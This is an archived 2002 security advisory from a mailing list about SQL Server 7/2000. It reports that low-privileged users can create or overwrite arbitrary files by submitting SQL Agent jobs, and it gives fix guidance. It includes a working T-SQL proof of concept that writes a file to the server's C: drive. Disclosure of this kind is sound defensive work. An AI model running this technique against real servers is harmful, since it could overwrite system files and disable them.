[NT] Arbitrary File Creation/Overwrite with SQL Agent Jobs

From: support@securiteam.com
Date: 08/20/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 20 Aug 2002 10:58:56 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Arbitrary File Creation/Overwrite with SQL Agent Jobs
------------------------------------------------------------------------

SUMMARY

With Microsoft SQL Server 2000 and 7 comes a "helper" service, the SQL
Server agent. The Agent is responsible for restarting the database service
if it stops for some reason, has a role to play in replication, and runs
scheduled jobs. As the public role can submit jobs to the SQL Agent, by
default, a low privileged user can create or overwrite arbitrary files on
the SQL Server.

DETAILS

Vulnerable systems:
 * Microsoft SQL Server version 2000
 * Microsoft SQL Server version 7

When adding a job one can specify the name of a file to output the results
of the Transact-SQL or CmdExec Job to. If this already exists, it can be
overwritten and if it does not already exist, a new file will be created.
By constructing the query of the job, one can place arbitrary contents in
this file.

If the SQL Server Agent is running with Local SYSTEM privileges, an
attacker will be able to overwrite key operating system files rendering
the server unbootable.

Proof of Concept:
-- ArbitraryFileCreate
-- For this to work the SQL Agent should be running.
-- Further, you'll need to change SERVER_NAME in
-- sp_add_jobserver to the SQL Server of your choice 

--
-- David Litchfield
-- (david@ngssoftware.com)
-- 19th August 2002

USE msdb

EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1

EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'

EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'

EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

Fix Information:
NGSSoftware informed Microsoft of these issues in July. To prevent low 
privileged users from submitting jobs one should disallow public access to 
the Job related stored procedures in the MSDB database particularly

sp_add_job
sp_add_jobstep
sp_add_jobserver
sp_start_job

Further to this, ensure that the SQL Server Agent is running as a low 
privileged NT account.

ADDITIONAL INFORMATION

The original advisory can be viewed by going to:
 <http://www.ngssoftware.com/advisories/mssql-espjobs2.txt> 
http://www.ngssoftware.com/advisories/mssql-espjobs2.txt

The information has been provided by  <mailto:david@ngssoftware.com> David 
Litchfield of NGSSoftware Insight Security Research.

======================================== 

This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 

==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages